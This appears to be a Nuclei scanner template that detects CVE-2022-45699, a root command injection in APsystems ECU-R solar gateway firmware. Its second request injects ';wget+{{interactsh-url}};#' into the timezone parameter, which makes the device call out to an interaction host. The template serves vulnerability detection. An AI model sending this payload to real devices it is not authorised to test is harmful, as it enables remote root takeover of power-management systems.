id: CVE-2022-45699

info:
  name: APsystems ECU-R Firmware - Command Injection
  author: pussycat0x
  severity: critical
  description: |
    Command injection in the administration interface in APSystems ECU-R version 5203 allows a remote unauthenticated attacker to execute arbitrary commands as root using the timezone parameter.
  impact: |
    Unauthenticated attackers can execute arbitrary commands with root privileges through the timezone parameter in the administration interface, potentially compromising the entire solar power management system and connected infrastructure.
  remediation: |
    Upgrade APsystems ECU-R firmware to a patched version that properly sanitizes the timezone parameter and validates input to prevent command injection.
  reference:
    - https://github.com/0xst4n/APSystems-ECU-R-RCE-Timezone
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-45699
    cwe-id: CWE-78,CWE-94
    epss-score: 0.76041
    epss-percentile: 0.9947
    cpe: cpe:2.3:o:apsystems:ecu-r_firmware:5203:*:*:*:*:*:*:*
  metadata:
    vendor: apsystems
    product: ecu-r_firmware
  tags: cve,cve2022,rce,apsystems,vkev,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "Altenergy Power Control Software"
        internal: true

  - raw:
      - |
        POST /index.php/management/set_timezone HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        timezone=;wget+{{interactsh-url}};#

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502201b981d76623a2ff421cc242a24656fb4d7150b8b7ae18fe35cec2bdc69f64f2202210090caaefe5f909ded5ca0e4dc7c7db3559048e017622c2878111ad4e32a3922ef:922c64590222798bb761d5b6d8e72950